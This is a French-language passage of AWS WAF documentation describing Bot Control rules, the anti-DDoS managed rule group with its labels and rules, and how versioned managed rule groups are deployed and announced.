| CategoryScrapingFramework |  Inspecte les robots à partir des frameworks de scraping Web, qui sont utilisés pour automatiser l'exploration et l'extraction du contenu des sites Web.  Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:scraping_framework` et `awswaf:managed:aws:bot-control:CategoryScrapingFramework`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategorySearchEngine |  Inspecte les robots des moteurs de recherche, qui explorent les sites Web pour indexer le contenu et rendre les informations disponibles pour les résultats des moteurs de recherche. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:search_engine` et `awswaf:managed:aws:bot-control:CategorySearchEngine`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategorySecurity |  Détecte les robots qui analysent les applications Web à la recherche de vulnérabilités ou qui effectuent des audits de sécurité. Par exemple, vous pouvez faire appel à un fournisseur de sécurité tiers qui analyse, surveille ou audite la sécurité de votre application Web. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:security` et `awswaf:managed:aws:bot-control:CategorySecurity`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategorySeo |  Inspecte les robots utilisés pour l'optimisation des moteurs de recherche. Par exemple, vous pouvez utiliser des outils de moteur de recherche qui explorent votre site pour vous aider à améliorer votre classement dans les moteurs de recherche.  Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:seo` et `awswaf:managed:aws:bot-control:CategorySeo`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategorySocialMedia |  Détecte les robots utilisés par les plateformes de réseaux sociaux pour fournir des résumés de contenu lorsque les utilisateurs partagent votre contenu. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:social_media` et `awswaf:managed:aws:bot-control:CategorySocialMedia`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryWebhooks |  Détecte les robots qui fournissent des notifications et des mises à jour de données automatisées d'une application à l'autre par le biais de rappels HTTP. Action de règle, appliquée uniquement aux robots non vérifiés : Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:webhooks` et `awswaf:managed:aws:bot-control:CategoryWebhooks`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'entreprend aucune action, mais il ajoute le nom du bot et l'étiquette de catégorie ainsi que l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| CategoryAI |  Inspecte les robots dotés d'intelligence artificielle (IA).  Cette règle applique l'action à tous les matchs, que les robots soient vérifiés ou non. Action de la règle Block  Étiquettes : `awswaf:managed:aws:bot-control:bot:category:ai` et `awswaf:managed:aws:bot-control:CategoryAI`  Pour les robots vérifiés, le groupe de règles correspond à cette règle et exécute une action. Il ajoute également le nom du bot et l'étiquetage des catégories, l'étiquetage des règles et l'étiquette`awswaf:managed:aws:bot-control:bot:verified`.   | 
| SignalAutomatedBrowser |  Inspecte les demandes qui ne proviennent pas de robots vérifiés pour détecter des indicateurs indiquant que le navigateur du client pourrait être automatisé. Les navigateurs automatisés peuvent être utilisés pour les tests ou le scraping. Par exemple, vous pouvez utiliser ces types de navigateurs pour surveiller ou vérifier le site Web de votre application. Action de la règle Block  Étiquettes : `awswaf:managed:aws:bot-control:signal:automated_browser` et `awswaf:managed:aws:bot-control:SignalAutomatedBrowser`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'applique aucun signal ou étiquette de règle.  | 
| SignalKnownBotDataCenter |  Inspecte les demandes qui ne proviennent pas de robots vérifiés à la recherche d'indicateurs de centres de données généralement utilisés par des robots.  Action de la règle Block  Étiquettes : `awswaf:managed:aws:bot-control:signal:known_bot_data_center` et `awswaf:managed:aws:bot-control:SignalKnownBotDataCenter`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'applique aucun signal ou étiquette de règle.  | 
| SignalNonBrowserUserAgent |  Inspecte les requêtes qui ne proviennent pas de robots vérifiés pour détecter les chaînes d'agent utilisateur qui ne semblent pas provenir d'un navigateur Web. Cette catégorie peut inclure les demandes d'API.  Action de la règle Block  Étiquettes : `awswaf:managed:aws:bot-control:signal:non_browser_user_agent` et `awswaf:managed:aws:bot-control:SignalNonBrowserUserAgent`  Pour les robots vérifiés, le groupe de règles ne correspond pas à cette règle et n'applique aucun signal ou étiquette de règle.  | 
| TGT\$1VolumetricIpTokenAbsent |  Inspecte les demandes qui ne proviennent pas de robots vérifiés et qui ont reçu au moins 5 demandes d'un seul client au cours des 5 dernières minutes et qui n'incluent pas de jeton de défi valide. Pour plus d'informations sur les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).  Il est possible que cette règle corresponde à une demande contenant un jeton si des jetons ont récemment été manquants dans les demandes du même client.  Le seuil appliqué par cette règle peut varier légèrement en raison de la latence.   Cette règle gère les jetons manquants différemment de l'étiquetage des jetons :`awswaf:managed:token:absent`. L'étiquetage des jetons permet d'étiqueter les demandes individuelles pour lesquelles il n'y a pas de jeton. Cette règle tient à jour le nombre de demandes dont le jeton est manquant pour chaque adresse IP du client, et elle le compare aux demandes dont le jeton dépasse la limite.  Action de la règle Challenge  Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:ip:token_absent` et `awswaf:managed:aws:bot-control:TGT_VolumetricIpTokenAbsent`   | 
| TGT\$1TokenAbsent |  Inspecte les demandes qui ne proviennent pas de robots vérifiés qui n'incluent pas de jeton de défi valide. Pour plus d'informations sur les jetons, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).  Action de la règle Count  Étiquettes : `awswaf:managed:aws:bot-control:TGT_TokenAbsent`   | 
| TGT\$1VolumetricSession |  Détecte un nombre anormalement élevé de demandes ne provenant pas de robots vérifiés et provenant d'une seule session client dans une fenêtre de 5 minutes. L'évaluation est basée sur une comparaison avec des lignes de base volumétriques standard qui utilisent les AWS WAF modèles de trafic historiques.  Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).  L'entrée en vigueur de cette règle peut prendre 5 minutes après son activation. Bot Control identifie les comportements anormaux de votre trafic Web en comparant le trafic actuel aux bases de trafic calculées. AWS WAF   Action de la règle CAPTCHA  Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:high` et `awswaf:managed:aws:bot-control:TGT_VolumetricSession`  Le groupe de règles applique les libellés suivants aux demandes de volume moyen et inférieur supérieures à un seuil minimum. Pour ces niveaux, la règle ne prend aucune action, que le client soit vérifié ou non : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:medium` et`awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:low`.  | 
| TGT\$1VolumetricSessionMaximum |  Détecte un nombre anormalement élevé de demandes ne provenant pas de robots vérifiés et provenant d'une seule session client dans une fenêtre de 5 minutes. L'évaluation est basée sur une comparaison avec des lignes de base volumétriques standard qui utilisent les AWS WAF modèles de trafic historiques.  Cette règle indique le niveau de confiance maximal dans l'évaluation. Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).  L'entrée en vigueur de cette règle peut prendre 5 minutes après son activation. Bot Control identifie les comportements anormaux de votre trafic Web en comparant le trafic actuel aux bases de trafic calculées. AWS WAF   Action de la règle Block  Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:maximum` et `awswaf:managed:aws:bot-control:TGT_VolumetricSessionMaximum`   | 
| TGT\$1SignalAutomatedBrowser |  Inspecte les jetons des demandes qui ne proviennent pas de robots vérifiés pour détecter des indicateurs indiquant que le navigateur du client pourrait être automatisé. Pour de plus amples informations, veuillez consulter [AWS WAF caractéristiques du jeton](waf-tokens-details.md). Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle CAPTCHA  Étiquettes : `awswaf:managed:aws:bot-control:targeted:signal:automated_browser` et `awswaf:managed:aws:bot-control:TGT_SignalAutomatedBrowser`   | 
| TGT\$1SignalBrowserAutomationExtension |  Inspecte les demandes qui ne proviennent pas de robots vérifiés et qui indiquent la présence d'une extension de navigateur facilitant l'automatisation, telle que Selenium IDE. Cette règle s'applique chaque fois qu'un utilisateur a installé ce type d'extension, même s'il ne l'utilise pas activement.  Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle CAPTCHA  Étiquettes : `awswaf:managed:aws:bot-control:targeted:signal:browser_automation_extension` et `awswaf:managed:aws:bot-control:TGT_SignalBrowserAutomationExtension`  | 
| TGT\$1SignalBrowserInconsistency |  Inspecte les requêtes qui ne proviennent pas de robots vérifiés pour détecter toute incohérence dans les données d'interrogation du navigateur. Pour de plus amples informations, veuillez consulter [AWS WAF caractéristiques du jeton](waf-tokens-details.md). Cette inspection ne s'applique que lorsque la requête Web contient un jeton. Les jetons sont ajoutés aux demandes par l'intégration de l'application SDKs et par les actions de règles CAPTCHA etChallenge. Pour de plus amples informations, veuillez consulter [Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md). Action de la règle CAPTCHA  Étiquettes : `awswaf:managed:aws:bot-control:targeted:signal:browser_inconsistency` et `awswaf:managed:aws:bot-control:TGT_SignalBrowserInconsistency`   | 
|  TGT\$1ML\$1CoordinatedActivityLow, TGT\$1ML\$1CoordinatedActivityMedium, TGT\$1ML\$1CoordinatedActivityHigh  |  Inspecte les demandes qui ne proviennent pas de robots vérifiés pour détecter tout comportement anormal correspondant à une activité distribuée et coordonnée des robots. Les niveaux de règles indiquent le niveau de confiance selon lequel un groupe de demandes participe à une attaque coordonnée.   Ces règles ne s'exécutent que si le groupe de règles est configuré pour utiliser l'apprentissage automatique (ML). Pour plus d'informations sur la configuration de ce choix, consultez[Ajout du groupe de règles géré par AWS WAF Bot Control à votre ACL Web](waf-bot-control-rg-using.md).   Les seuils appliqués par ces règles peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   AWS WAF effectue cette inspection par le biais d'une analyse par apprentissage automatique des statistiques de trafic du site Web. AWS WAF analyse le trafic Web toutes les quelques minutes et optimise l'analyse pour détecter les robots de faible intensité et de longue durée répartis sur de nombreuses adresses IP.  Ces règles peuvent correspondre sur un très petit nombre de demandes avant de déterminer qu'une attaque coordonnée n'est pas en cours. Donc, si vous ne voyez qu'une ou deux correspondances, les résultats peuvent être des faux positifs. Cependant, si vous voyez de nombreux matchs échapper à ces règles, vous êtes probablement victime d'une attaque coordonnée.   Ces règles peuvent prendre jusqu'à 24 heures pour entrer en vigueur une fois que vous avez activé les règles ciblées Bot Control avec l'option ML. Bot Control identifie les comportements anormaux de votre trafic Web en comparant le trafic actuel aux bases de trafic calculées AWS WAF . AWS WAF calcule les lignes de base uniquement lorsque vous utilisez les règles ciblées Bot Control avec l'option ML, et l'établissement de bases de référence significatives peut prendre jusqu'à 24 heures.   Nous mettons régulièrement à jour nos modèles d'apprentissage automatique en fonction de ces règles, afin d'améliorer les prévisions des robots. Si vous remarquez un changement soudain et substantiel dans les prédictions des robots établies par ces règles, contactez votre responsable de compte ou ouvrez un dossier auprès [AWS Support du Center](https://console.aws.amazon.com/support/home#/).  Actions relatives aux règles :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html) Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:coordinated_activity:low\|medium\|high` et `awswaf:managed:aws:bot-control:TGT_ML_CoordinatedActivityLow\|Medium\|High`   | 
|  TGT\$1TokenReuseIpLow, TGT\$1TokenReuseIpMedium, TGT\$1TokenReuseIpHigh  |  Inspecte les demandes qui ne proviennent pas de robots vérifiés concernant l'utilisation d'un seul jeton parmi plusieurs IPs au cours des 5 dernières minutes. Chaque niveau est limité au nombre de joueurs distincts IPs :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html)  Les seuils appliqués par ces règles peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Actions relatives aux règles :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html) Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:token_reuse:ip:low\|medium\|high` et `awswaf:managed:aws:bot-control:TGT_TokenReuseIpLow\|Medium\|High`   | 
|  TGT\$1TokenReuseCountryLow, TGT\$1TokenReuseCountryMedium, TGT\$1TokenReuseCountryHigh  |  Inspecte les demandes qui ne proviennent pas de robots vérifiés concernant l'utilisation d'un seul jeton dans plusieurs pays au cours des 5 dernières minutes. Chaque niveau limite le nombre de pays distincts :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html)  Les seuils appliqués par ces règles peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Actions relatives aux règles :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html) Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:token_reuse:country:low\|medium\|high` et `awswaf:managed:aws:bot-control:TGT_TokenReuseCountryLow\|Medium\|High`   | 
|  TGT\$1TokenReuseAsnLow, TGT\$1TokenReuseAsnMedium, TGT\$1TokenReuseAsnHigh  |  Inspecte les demandes qui ne proviennent pas de robots vérifiés concernant l'utilisation d'un seul jeton sur plusieurs numéros de systèmes autonomes réseau (ASNs) au cours des 5 dernières minutes. Chaque niveau est limité au nombre de joueurs distincts ASNs :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html)  Les seuils appliqués par ces règles peuvent varier légèrement en raison de la latence. Quelques demandes peuvent dépasser la limite avant que l'action de la règle ne soit appliquée.   Actions relatives aux règles :  [\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/fr_fr/waf/latest/developerguide/aws-managed-rule-groups-bot.html) Étiquettes : `awswaf:managed:aws:bot-control:targeted:aggregate:volumetric:session:token_reuse:asn:low\|medium\|high` et `awswaf:managed:aws:bot-control:TGT_TokenReuseAsnLow\|Medium\|High`   | 

# AWS WAF Groupe de règles de prévention du déni de service distribué (DDoS)
<a name="aws-managed-rule-groups-anti-ddos"></a>

Cette section décrit le groupe de règles AWS WAF géré pour la protection contre les attaques par déni de service distribué (DDoS).

VendorName:`AWS`, Nom :`AWSManagedRulesAntiDDoSRuleSet`, WCU : 50

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 

Le groupe de règles gérées DDo anti-S fournit des règles qui détectent et gèrent les demandes qui participent ou sont susceptibles de participer à des attaques DDo S. En outre, le groupe de règles étiquette toutes les demandes qu'il évalue lors d'un événement probable. 

## Considérations relatives à l'utilisation de ce groupe de règles
<a name="aws-managed-rule-groups-anti-ddos-using"></a>

Ce groupe de règles fournit des mesures d'atténuation souples et strictes pour les requêtes Web destinées à des ressources soumises à une attaque DDo S. Pour détecter différents niveaux de menace, vous pouvez ajuster la sensibilité des deux types d'atténuation à des niveaux de suspicion élevés, moyens ou faibles.
+ **Atténuation souple** : le groupe de règles peut envoyer des défis de navigateur silencieux en réponse à des demandes capables de gérer le défi interstitiel. Pour plus d'informations sur les conditions requises pour exécuter le défi, consultez[CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md).
+ **Atténuation stricte** : le groupe de règles peut bloquer complètement les demandes. 

Pour plus d'informations sur le fonctionnement du groupe de règles et sur sa configuration, consultez[Protection DDo anti-S avancée à l'aide du groupe de règles géré AWS WAF DDo anti-S](waf-anti-ddos-advanced.md). 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

Ce groupe de règles fait partie des protections intelligentes d'atténuation des menaces contenues dans AWS WAF. Pour plus d'informations, consultez [Atténuation intelligente des menaces dans AWS WAF](waf-managed-protections.md).

Pour minimiser les coûts et optimiser la gestion du trafic, utilisez ce groupe de règles conformément aux meilleures pratiques. Consultez [Les meilleures pratiques pour l'atténuation intelligente des menaces dans AWS WAF](waf-managed-protections-best-practices.md).

## Étiquettes ajoutées par ce groupe de règles
<a name="aws-managed-rule-groups-anti-ddos-labels"></a>

Ce groupe de règles géré ajoute des étiquettes aux requêtes Web qu'il évalue, lesquelles sont accessibles aux règles exécutées après ce groupe de règles dans votre pack de protection (ACL Web). AWS WAF enregistre également les étiquettes selon les CloudWatch statistiques d'Amazon. Pour obtenir des informations générales sur les étiquettes et les mesures relatives aux étiquettes, reportez-vous [Étiquetage des requêtes Web](waf-labels.md) aux sections et[Métriques et dimensions des étiquettes](waf-metrics.md#waf-metrics-label). 

### Étiquettes à jetons
<a name="aws-managed-rule-groups-anti-ddos-labels-token"></a>

Ce groupe de règles utilise la gestion des AWS WAF jetons pour inspecter et étiqueter les requêtes Web en fonction de l'état de leurs AWS WAF jetons. AWS WAF utilise des jetons pour le suivi et la vérification des sessions client. 

Pour plus d'informations sur les jetons et leur gestion, consultez[Utilisation de jetons pour l'atténuation AWS WAF intelligente des menaces](waf-tokens.md).

Pour plus d'informations sur les composants de l'étiquette décrits ici, voir[Syntaxe des étiquettes et exigences de dénomination dans AWS WAF](waf-rule-label-requirements.md).

**Libellé de session client**  
L'étiquette `awswaf:managed:token:id:identifier` contient un identifiant unique que la gestion des AWS WAF jetons utilise pour identifier la session client. L'identifiant peut changer si le client acquiert un nouveau jeton, par exemple après avoir supprimé le jeton qu'il utilisait. 

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquette d'empreinte digitale du navigateur**  
L'étiquette `awswaf:managed:token:fingerprint:fingerprint-identifier` contient un identifiant d'empreinte digitale robuste que la gestion des AWS WAF jetons calcule à partir de divers signaux du navigateur client. Cet identifiant reste le même lors de plusieurs tentatives d'acquisition de jetons. L'identifiant d'empreinte digitale n'est pas propre à un seul client.

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquettes d'état des jetons : préfixes d'espace de noms d'étiquettes**  
Les étiquettes d'état du jeton indiquent le statut du jeton ainsi que les informations relatives au défi et au CAPTCHA qu'il contient. 

Chaque étiquette de statut de jeton commence par l'un des préfixes d'espace de noms suivants : 
+ `awswaf:managed:token:`— Utilisé pour signaler l'état général du jeton et pour rendre compte de l'état des informations de défi du jeton. 
+ `awswaf:managed:captcha:`— Utilisé pour rendre compte de l'état des informations CAPTCHA du jeton. 

**Étiquettes d'état des jetons : noms des étiquettes**  
Après le préfixe, le reste de l'étiquette fournit des informations détaillées sur l'état du jeton : 
+ `accepted`— Le jeton de demande est présent et contient les éléments suivants : 
  + Un défi ou une solution CAPTCHA valide.
  + Un défi ou un horodatage CAPTCHA non expiré.
  + Spécification de domaine valide pour le pack de protection (ACL Web). 

  Exemple : L'étiquette `awswaf:managed:token:accepted` indique que le jeton des requêtes Web contient une solution de défi valide, un horodatage de défi non expiré et un domaine valide.
+ `rejected`— Le jeton de demande est présent mais ne répond pas aux critères d'acceptation. 

  Outre l'étiquette rejetée, la gestion des jetons ajoute un espace de noms et un nom d'étiquette personnalisés pour en indiquer la raison. 
  + `rejected:not_solved`— Le challenge ou la solution CAPTCHA ne sont pas présents dans le jeton. 
  + `rejected:expired`— L'horodatage du challenge ou du CAPTCHA du jeton a expiré, conformément aux durées d'immunité des jetons configurées par votre pack de protection (ACL Web). 
  + `rejected:domain_mismatch`— Le domaine du jeton ne correspond pas à la configuration du domaine du jeton de votre pack de protection (ACL Web). 
  + `rejected:invalid`— AWS WAF n'a pas pu lire le jeton indiqué. 

  Exemple : `awswaf:managed:captcha:rejected:expired` ensemble, les `awswaf:managed:captcha:rejected` libellés indiquent que la demande ne comportait pas de résolution CAPTCHA valide car l'horodatage CAPTCHA figurant dans le jeton a dépassé le délai d'immunité du jeton CAPTCHA configuré dans le pack de protection (ACL Web).
+ `absent`— La demande ne contient pas le jeton ou le gestionnaire de jetons n'a pas pu le lire. 

  Exemple : L'étiquette `awswaf:managed:captcha:absent` indique que la demande ne contient pas le jeton. 

### Étiquettes DDo anti-S
<a name="aws-managed-rule-groups-anti-ddos-labels-rg"></a>

Le groupe de règles gérées Anti- DDo S génère des étiquettes avec le préfixe d'espace de noms `awswaf:managed:aws:anti-ddos:` suivi de tout espace de noms personnalisé et du nom de l'étiquette. Chaque étiquette reflète certains aspects des résultats DDo anti-S.

Le groupe de règles peut ajouter plusieurs des libellés suivants à une demande, en plus des libellés ajoutés par des règles individuelles. 
+ `awswaf:managed:aws:anti-ddos:event-detected`— Indique que la demande est destinée à une ressource protégée pour laquelle le groupe de règles géré détecte un événement DDo S. Le groupe de règles géré détecte les événements lorsque le trafic vers la ressource présente un écart significatif par rapport à la ligne de base de trafic de la ressource. 

  Le groupe de règles ajoute cette étiquette à chaque demande envoyée à la ressource lorsqu'elle est dans cet état, de sorte que le trafic légitime et le trafic d'attaque obtiennent cette étiquette. 
+ `awswaf:managed:aws:anti-ddos:ddos-request`— Indique que la demande provient d'une source suspectée de participer à un événement. 

  Outre l'étiquette générale, le groupe de règles ajoute les étiquettes suivantes qui indiquent le niveau de confiance. 

  `awswaf:managed:aws:anti-ddos:low-suspicion-ddos-request`— Indique une demande d'attaque DDo S probable.

  `awswaf:managed:aws:anti-ddos:medium-suspicion-ddos-request`— Indique une demande d'attaque DDo S très probable.

  `awswaf:managed:aws:anti-ddos:high-suspicion-ddos-request`— Indique une demande d'attaque DDo S très probable.
+ `awswaf:managed:aws:anti-ddos:challengeable-request`— Indique que l'URI de la demande est capable de gérer l'Challengeaction. Le groupe de règles géré l'applique à toute demande dont l'URI n'est pas exemptée. URIs sont exemptés s'ils correspondent aux expressions régulières d'URI exemptées du groupe de règles. 

  Pour plus d'informations sur les exigences relatives aux requêtes susceptibles de relever le défi d'un navigateur silencieux, consultez[CAPTCHAet comportement Challenge d'action](waf-captcha-and-challenge-actions.md).

Vous pouvez récupérer toutes les étiquettes d'un groupe de règles via l'API en appelant`DescribeManagedRuleGroup`. Les étiquettes sont répertoriées dans la `AvailableLabels` propriété de la réponse. 

Le groupe de règles gérées Anti- DDo S applique des libellés aux demandes, mais n'agit pas toujours en conséquence. La gestion des demandes dépend de la confiance avec laquelle le groupe de règles détermine la participation à une attaque. Si vous le souhaitez, vous pouvez gérer les demandes que le groupe de règles labellise en ajoutant une règle de correspondance d'étiquettes qui s'exécute après le groupe de règles. Pour plus d'informations à ce sujet et pour des exemples, consultez[AWS WAF Prévention du déni de service distribué (DDoS)](waf-anti-ddos.md).

## Liste des règles DDo anti-S
<a name="aws-managed-rule-groups-anti-ddos-rules"></a>

Cette section répertorie les règles DDo anti-S.

 

**Note**  
Cette documentation couvre la version statique la plus récente de ce groupe de règles géré. Nous signalons les modifications de version dans le journal des modifications à l'adresse. [AWS Journal des modifications des règles gérées](aws-managed-rule-groups-changelog.md) Pour plus d'informations sur les autres versions, utilisez la commande API [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html).   
Les informations que nous publions concernant les règles des groupes de règles AWS gérées visent à vous fournir les informations dont vous avez besoin pour utiliser les règles sans donner aux acteurs malveillants ce dont ils ont besoin pour les contourner.   
Si vous avez besoin de plus d'informations que celles que vous trouverez ici, contactez le [AWS Support Centre](https://console.aws.amazon.com/support/home#/). 


| Nom de la règle | Description | 
| --- | --- | 
| ChallengeAllDuringEvent |  Correspond aux demandes portant l'`awswaf:managed:aws:anti-ddos:challengeable-request`étiquette de toute ressource protégée actuellement attaquée.  Action de la règle Challenge Vous ne pouvez remplacer cette action de règle que par Allow ouCount. L'utilisation de n'Allowest pas recommandée. Quel que soit le paramètre d'action d'une règle, la règle ne correspond qu'aux demandes `challengeable-request` portant l'étiquette. La configuration de cette règle influe sur l'évaluation de la règle suivante,`ChallengeDDoSRequests`. AWS WAF évalue cette règle uniquement lorsque l'action associée à cette règle est définie surCount, dans la configuration du groupe de règles géré par l'ACL Web.  Si votre charge de travail est vulnérable à des variations inattendues du volume de demandes, nous vous recommandons de contester toutes les demandes contestables, en conservant le paramètre d'action par défaut deChallenge. Pour les applications moins sensibles, vous pouvez définir l'action de cette règle sur, Count puis ajuster la sensibilité de vos Challenge réponses en fonction de la règle`ChallengeDDoSRequests`.  Étiquettes : `awswaf:managed:aws:anti-ddos:ChallengeAllDuringEvent`   | 
| ChallengeDDoSRequests |  Correspond aux demandes pour une ressource protégée qui respectent ou dépassent le paramètre de sensibilité aux défis configuré du groupe de règles, pendant les périodes où la ressource est attaquée.  Action de la règle Challenge Vous ne pouvez remplacer cette action de règle que par Allow ouCount. L'utilisation de n'Allowest pas recommandée. Dans tous les cas, la règle ne correspond qu'aux demandes `challengeable-request` portant l'étiquette. AWS WAF n'évalue cette règle que si vous remplacez l'action par celle de Count la règle précédente,. `ChallengeAllDuringEvent`  Étiquettes : `awswaf:managed:aws:anti-ddos:ChallengeDDoSRequests`   | 
| DDoSRequests |  Correspond aux demandes pour une ressource protégée qui respectent ou dépassent le paramètre de sensibilité aux blocs configuré du groupe de règles, pendant les périodes où la ressource est attaquée.  Action de la règle Block Étiquettes : `awswaf:managed:aws:anti-ddos:DDoSRequests`   | 

# Déploiements pour les groupes de règles AWS gérées versionnés
<a name="waf-managed-rule-groups-deployments"></a>

Cette section explique comment AWS déployer les mises à jour des groupes de règles AWS gérées.

AWS déploie les modifications apportées à ses groupes de règles AWS gérées versionnés dans trois déploiements standard : version candidate, version statique et version par défaut. En outre, il AWS peut parfois être nécessaire de publier un déploiement d'exception ou d'annuler le déploiement d'une version par défaut. 

**Note**  
Cette section s'applique uniquement aux groupes de règles AWS gérées qui sont versionnés. Les seuls groupes de règles qui ne sont pas versionnés sont les groupes de règles de réputation IP. 

**Topics**
+ [Notifications pour les déploiements de groupes de règles AWS gérées](waf-managed-rule-groups-deployments-notifications.md)
+ [Vue d'ensemble des déploiements standard pour les règles AWS gérées](waf-managed-rule-groups-deployments-standard.md)
+ [États de version typiques pour les règles AWS gérées](waf-managed-rule-groups-typical-version-states.md)
+ [Publiez des déploiements candidats pour les règles AWS gérées](waf-managed-rule-groups-deployments-release-candidate.md)
+ [Déploiements de versions statiques pour les règles AWS gérées](waf-managed-rule-groups-deployments-static-version.md)
+ [Déploiements de versions par défaut pour AWS Managed Rules](waf-managed-rule-groups-deployments-default-version.md)
+ [Déploiements exceptionnels pour les règles AWS gérées](waf-managed-rule-groups-deployments-exceptions.md)
+ [Annulations de déploiement par défaut pour les règles AWS gérées](waf-managed-rule-groups-deployments-default-rollbacks.md)

# Notifications pour les déploiements de groupes de règles AWS gérées
<a name="waf-managed-rule-groups-deployments-notifications"></a>

Cette section explique comment les notifications Amazon SNS fonctionnent avec les groupes de règles AWS gérées.

Les groupes de règles AWS gérées versionnés fournissent tous des notifications de mise à jour SNS pour les déploiements et utilisent tous la même rubrique SNS Amazon Resource Name (ARN). Les seuls groupes de règles qui ne sont pas versionnés sont les groupes de règles de réputation IP. 

